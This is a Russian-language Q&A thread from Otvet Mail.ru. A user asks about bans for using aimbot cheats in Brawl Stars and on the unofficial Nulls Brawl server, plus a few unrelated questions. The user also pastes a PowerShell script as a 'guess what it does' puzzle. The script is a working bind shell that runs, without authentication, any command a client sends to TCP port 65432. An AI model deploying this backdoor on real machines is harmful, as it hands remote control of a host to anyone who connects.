Top.Mail.Ru
Ответы

Когда меня забанят в Brawl Stars и ещё пару вопросов

1. я играю в бравл старс с читами (не реклама) когда меня забанят? читы не визуал, автоаим как у явного читера автоманс явно не человеческий ну и играю уже 2 дня, если вовремя брошу играть с читами меня не забанят?

2. также я играю в нюльс бравл (не реклама) ну там цензуры никакой нет и пиши где и что хочешь, я узнал что у нюльса есть какие-то правила там и задал сам себе вопрос "могут ли забанить в нюльсе?" может вас банили в Nulls Brawl? если да то почему, мне кажется там забанят только если фсб узнают про криминальные сделки в комнатах в нюльсе.

3. можно найти переменную f(x) если там выражения без f и без x да и вообще без =, пример скидывать и писать не буду (там не для слабонервных) я попробую скачать программу которая там по фото пример решает, одноклассники пользуются а я нет, что за программа (как называется)?

4. в какого бога вы верите? если в пуджа то почему?

5. предположите что за язык и что делает

6. $listener = [System.Net.Sockets.TcpListener]::new([System.Net.IPAddress]::Any, 65432)

7. $listener.Start()

8. Write-Host "Server started, waiting for connection..."

9. while ($true) {

10. $client = $listener.AcceptTcpClient()

11. $stream = $client.GetStream()

12. $reader = [System.IO.StreamReader]::new($stream)

13. $writer = [System.IO.StreamWriter]::new($stream)

14. $writer.AutoFlush = $true

15. Write-Host "Connection established!"

16. while ($true) {

17. $command = $reader.ReadLine()

18. if ($command -eq "exit") {

19. Write-Host "Shutting down server..."

20. break 2

21. } elseif ($command) {

22. Write-Host "Executing command: $command"

23. try {

24. $output = Invoke-Expression $command 2>&1

25. $writer.WriteLine($output)

26. } catch {

27. $writer.WriteLine($_)

28. }

29. }

30. }

31. $client.Close()

32. }

33. $listener.Stop()

34. на ссылки не переходите они случайные( там были пропуски строк но мыло ру не разрешило пустые строки сделать)список в коде случаен, лень убирать.

По дате
По Рейтингу
Оракул
4мес

Блокировку аккаунта в игре можно получить, если вы нарушите правила Supercell. Есть 2 типа блокировок: временная и навсегда (перманентная). Они выдаются в зависимости от масштабов нарушения. Здесь вы узнаете, за что можно получить блокировку аккаунта в игре.